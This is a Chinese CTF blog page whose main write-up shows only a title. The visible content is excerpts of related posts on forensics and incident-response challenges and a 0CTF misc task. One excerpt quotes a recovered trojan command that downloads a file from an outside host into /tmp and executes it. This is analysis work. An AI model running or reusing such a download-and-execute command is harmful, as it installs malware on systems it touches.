CISCN2026 初赛 WP
发表于|CTF
|浏览量:
文章作者: Himekawa
版权声明: 本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来源 Himekawaの小屋!
相关推荐
2025-03-31
2025长城杯半决赛 应急响应复现
ISW-1 小路是一名网络安全网管,据反映发现公司主机上有异常外联信息,据回忆前段时间执行过某些更新脚本(已删除),现在需要协助小路同学进行网络安全应急响应分析,查找木马,进一步分析,寻找攻击源头,获取攻击者主机权限获取 flag 文件。 题目 1:找出主机上木马回连的主控端服务器 IP 地址[不定时(3~5 分钟)周期性],并以 flag{MD5}形式提交,其中 MD5 加密目标的原始字符串格式 IP:port。 下载镜像,使用 R-Studio 打开 在/home/ubuntu目录下可以看到被删除的1.txt文件 1wget –quiet http://mirror.unknownrepo.net/f/l/a/g/system_upgrade -O /tmp/.system_upgrade && chmod +x /tmp/.system_upgrade && /tmp/.system_upgrade 联想背景中提及的更新操作,再翻看.viminfo查看命令模式下执行的历史命令,可以看到以下文件被更新 12/etc/systemd/system...
2025-05-25
第二届Parloo杯应急响应线下赛
拓扑图 主要工具:R-Studio,取证大师,CTF-NetA,Wireshark 攻击者 IP 地址 1(内网) 查看 Server3 里的/var/log/nginx/error.log flag{192.168.162.134} 攻击者 IP 地址 2(公网) 进入 WindowsPC,提交地址栏内找到的 ip。也可以在网络服务缓存内找到。 flag{111.170.148.147} flag1 在 Server1 的/root/.ssh/authorized_keys内找到 flag1。此外,很多 flag 可以利用取证大师或 XWF 直接全局搜索搜出来 flag{redis_attack_zgsfsys} flag2 在 Server1 的/tmp/hack文件内找到 flag2{Hack_Base_area} flag3 用 X-Ways 全局搜索 flag3 找到黑客传输的 flag3.txt,取证大师搜不到 flag{666hackis888999} flag4 ...
2025-12-22
0CTF 2025 misc WP
0CTF 2025 部分 misc 的 WP,Motion Blur还在复现 Check-in 网页 F12 搜0ops可以得到第一部分 flag 为0ops{WelCome!4nd,加 discord 得到第二部分m4y_yoU_enjoY_the_0Ctf_2025} GhostDB 一个 vlang 编写的程序,V语言是一门新兴的、静态类型的编译型编程语言,专为构建可维护性高的软件而设计。在设计理念上与 Go 语言相似。 vlang审计,要求rows大于114514,但一开始的插入配额是60000,升级到Pro为无限 由于V语言是开源的,可以找到BSTree部分的源码:https://github.com/vlang/v/blob/master/vlib/datatypes/bstree.v BSTree(二叉搜索树)在remove操作时存在溢出点:删除拥有两个子节点的节点时会丢失右子树。故我们在不升级到Pro的情况下,可以先利用60000的插入配额上限构造一个尽可能大的二叉树,随后删除 Root,触发 Bug 导致整个右子树丢失,N = 58000,a...
评论
公告
o.O

